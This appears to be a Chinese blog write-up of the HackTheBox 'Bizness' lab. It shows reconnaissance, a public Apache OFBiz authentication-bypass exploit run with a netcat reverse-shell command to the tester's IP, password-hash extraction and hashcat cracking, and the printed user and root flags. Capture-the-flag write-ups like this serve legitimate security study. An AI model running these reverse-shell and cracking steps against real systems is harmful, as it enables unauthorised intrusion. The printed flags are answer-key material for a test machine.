[Meachines][Easy]Bizness

2024-05-08 649 0

Main

$ nmap -p- 10.10.11.252 --min-rate 1000

[Meachines][Easy]Bizness插图

$ dirsearch -u https://bizness.htb/

[Meachines][Easy]Bizness插图1

$ whatweb https://bizness.htb/control/login

[Meachines][Easy]Bizness插图2

存在一个未授权的RCE

[Meachines][Easy]Bizness插图3

$ git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git
$ cd Apache-OFBiz-Authentication-Bypass/
$ python3 exploit.py --url https://bizness.htb/ --cmd 'nc -c bash 10.10.16.23 10032'

[Meachines][Easy]Bizness插图4

User Flag

$ cat /home/ofbiz/user.txt

[Meachines][Easy]Bizness插图5

4f868ad44d8eb00d2d7d094bd5279de0

Root Flag

$ cat /opt/ofbiz/runtime/data/derby/ofbiz/seg0/c54d0.dat

[Meachines][Easy]Bizness插图6

为了使用hashcat等密码破解工具破解这些哈希值,需要先将其进行base64解码,然后转换为十六进制字符串。这是因为hashcat等工具通常需要将哈希值以十六进制字符串的形式输入进行破解。

[Meachines][Easy]Bizness插图7

$ hashcat -m 120 -a 0 -d 1 "b8fd3f41a541a435857a8f3e751cc3a91c174362:d" /usr/share/wordlists/rockyou.txt

[Meachines][Easy]Bizness插图8

$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I

  • $SHA$: 这部分指示了使用的哈希算法。在这种情况下,$SHA$表示密码是使用SHA哈希算法进行加密的。
    d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I: 这部分是经过哈希处理的密码值。通常,密码哈希值是通过将密码与随机生成的字符串(称为盐值)一起输入到哈希函数中生成的。在这个字符串中,d$可能是盐值的一部分,而uP0_QaVBpDWFeo8-dRzDqRwXQ2I可能是密码的哈希值。

[Meachines][Easy]Bizness插图9

# cat /root/root.txt

[Meachines][Easy]Bizness插图10

8c72dd83a893d66bef258dc1c43eb2e4


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论